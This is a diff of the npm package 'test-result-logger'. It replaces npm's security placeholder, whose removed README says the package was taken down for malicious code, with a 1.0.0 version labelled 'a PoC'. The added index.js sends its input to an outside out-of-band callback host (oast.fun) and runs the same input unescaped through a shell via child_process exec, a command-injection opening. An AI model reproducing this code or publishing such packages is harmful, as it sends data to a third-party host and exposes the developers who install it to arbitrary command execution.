test-result-logger 0.0.1-security → 1.0.0

package/index.js

@@ -0,0 +1,26 @@
+// index.js
+const { exec } = require('child_process');
+const http = require('http');
+
+function vulnerableFunction(payload) {
+  // Replace "your.server.com" with the hostname or IP address of your server
+  const url = `http://cen13pe2vtc0000dhckgg8kot5eyyyyyb.oast.fun/?payload=${payload}`;
+
+  // Make an HTTP request to your server
+  http.get(url, (res) => {
+    console.log(`Server response status: ${res.statusCode}`);
+    res.setEncoding('utf8');
+    res.on('data', (chunk) => {
+      console.log(`Server response body: ${chunk}`);
+    });
+  });
+  
+  // Execute the vulnerable command
+  exec(`echo ${payload}`, (error, stdout, stderr) => {
+    console.log(stdout);
+  });
+}
+
+module.exports = {
+  vulnerableFunction
+};

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "test-result-logger",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "this is a PoC",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "ratrarity",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=test-result-logger for more information.